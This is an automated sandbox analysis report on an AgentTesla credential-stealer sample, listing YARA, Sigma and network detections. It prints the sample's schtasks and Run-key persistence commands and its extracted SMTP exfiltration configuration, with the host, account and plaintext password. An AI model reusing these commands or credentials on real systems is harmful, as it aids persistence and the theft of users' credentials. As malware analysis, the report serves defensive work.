24.2.svchost.exe.17052088b18.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.svchost.exe.17052088b18.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
24.2.svchost.exe.17052088b18.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.svchost.exe.1f24404c2a0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.svchost.exe.1f24404c2a0.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.svchost.exe.1f24404c2a0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6df2f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dfa1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e02b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e0bd:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e127:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e199:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e22f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e2bf:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.svchost.exe.2145227c390.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.2145227c390.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.svchost.exe.2145227c390.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6df2f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dfa1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e02b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e0bd:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e127:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e199:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e22f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e2bf:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.svchost.exe.214522b6dd8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.214522b6dd8.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.svchost.exe.214522b6dd8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
24.2.svchost.exe.1705204e0d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.svchost.exe.1705204e0d0.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
24.2.svchost.exe.1705204e0d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6df2f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33559:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dfa1:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e02b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33675:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e0bd:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e127:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33751:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e199:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e22f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33877:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e2bf:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 46 entries

Sigma Signatures

Networking

Sigma detected: MSBuild connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.174.175.187, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7356, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 64305

Sigma detected: RegAsm connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.174.175.187, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 2016, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49722

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe, ProcessId: 6688, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_29.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe, ParentProcessId: 6688, ParentProcessName: LisectAVT_2403002A_29.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7012, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5932, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 3260, ProcessName: svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5932, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 3260, ProcessName: svchost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe, ProcessId: 6688, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.174.175.187, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe, Initiated: true, ProcessId: 572, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49720

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7012, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 4092, ProcessName: schtasks.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6872, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1808, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5504, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_29.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe, ParentProcessId: 6688, ParentProcessName: LisectAVT_2403002A_29.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7012, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T21:54:08.020045+0200
SID:	2022930
Source Port:	443
Destination Port:	49717
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T21:54:48.645667+0200
SID:	2022930
Source Port:	443
Destination Port:	64310
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002A_29.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe

Avira: detection malicious, Label: TR/AD.Nekark.jlfug

Found malware configuration

Source: 24.2.svchost.exe.17052088b18.0.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "cp8nl.hyperhost.ua", "Username": "royallog@fibraunollc.top", "Password": " 7213575aceACE@#$ "}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002A_29.exe

Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2287115517.0000021D90C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2287115517.0000021D9084F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2390489517.00000214422A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2462594062.000001704247C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_29.exe PID: 6688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7572, type: MEMORYSTR

Source: LisectAVT_2403002A_29.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: HFayo.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Dynamic.pdbp source: WERB646.tmp.dmp.21.dr
Source:	Binary string: Microsoft.CSharp.pdbX source: WERD632.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Configuration.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.pdb^ source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.pdbMZ source: WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Core.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Xml.pdbSystem.dll` source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Configuration.pdb8 source: WERD632.tmp.dmp.29.dr
Source:	Binary string: System.Drawing.pdb0 source: WERD632.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: Microsoft.CSharp.pdb0 source: WERB0D8.tmp.dmp.19.dr
Source:	Binary string: System.Dynamic.pdbH source: WERB0D8.tmp.dmp.19.dr
Source:	Binary string: System.Dynamic.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: mscorlib.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: mscorlib.pdbU source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.pdb0#p source: WERB0D8.tmp.dmp.19.dr
Source:	Binary string: System.Core.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Drawing.pdb` source: WERB646.tmp.dmp.21.dr
Source:	Binary string: HFayo.pdbP/ source: WERB646.tmp.dmp.21.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdb source: LisectAVT_2403002A_29.exe, svchost.exe.1.dr
Source:	Binary string: System.Configuration.pdbP source: WERB0D8.tmp.dmp.19.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Windows.Forms.pdb@ source: WERF524.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdb source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERB646.tmp.dmp.21.dr, WERB0D8.tmp.dmp.19.dr, WERD632.tmp.dmp.29.dr, WERF524.tmp.dmp.36.dr

Source: global traffic

TCP traffic: 192.168.2.6:49720 -> 185.174.175.187:587

Source: global traffic

TCP traffic: 192.168.2.6:64302 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 185.174.175.187 185.174.175.187

Source: Joe Sandbox View

ASN Name: ITLDC-NLUA ITLDC-NLUA

Source: global traffic

TCP traffic: 192.168.2.6:49720 -> 185.174.175.187:587

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.27
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.27
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: cp8nl.hyperhost.ua

Source: RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cp8nl.hyperhost.ua
Source: RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006426000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 00000002.00000002.3405457623.00000298F0EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
